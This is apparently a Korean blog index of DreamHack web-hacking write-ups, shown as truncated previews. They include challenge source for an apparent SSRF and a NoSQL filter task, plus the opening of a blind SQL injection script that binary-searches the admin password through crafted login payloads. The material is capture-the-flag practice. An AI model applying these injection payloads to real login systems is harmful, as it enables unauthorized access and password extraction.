보호되어 있는 글입니다.
Web Hacking/DreamHack
보호되어 있는 글입니다.
from flask import Flask, request, render_template, url_for, redirect from urllib.request import urlopen import base64, os app = Flask(__name__) app.secret_key = os.urandom(32) mini_database = [] @app.route('/') def index(): return redirect(url_for('view')) @app.route('/request') def url_request(): url = request.args.get('url', '').lower() title = request.args.get('title', '') if url == '' or url..
Mongodb로 작성된 사이트이다. const express = require('express'); const app = express(); const mongoose = require('mongoose'); mongoose.connect('mongodb://localhost/main', { useNewUrlParser: true, useUnifiedTopology: true }); const db = mongoose.connection; // flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'} const BAN = ['admin', 'dh', 'admi']; filter = function(data){ const dump = JSON.string..
dreamhack의 simple_sqli를 blind sql injection으로 풀어보았다. import requests URL="http://host3.dreamhack.games:11344/login" #비밀번호 길이 password_length = 0 ''' def binsearch(low: int, high: int): while 1: mid = (low + high) // 2 if low + 1 >= high: break data = {"userid" : f"admin\" and length(userpassword) < {mid} -- ", "userpassword" : 1} r = requests.post(URL, data=data) if "admin" in r.text: high = mid..
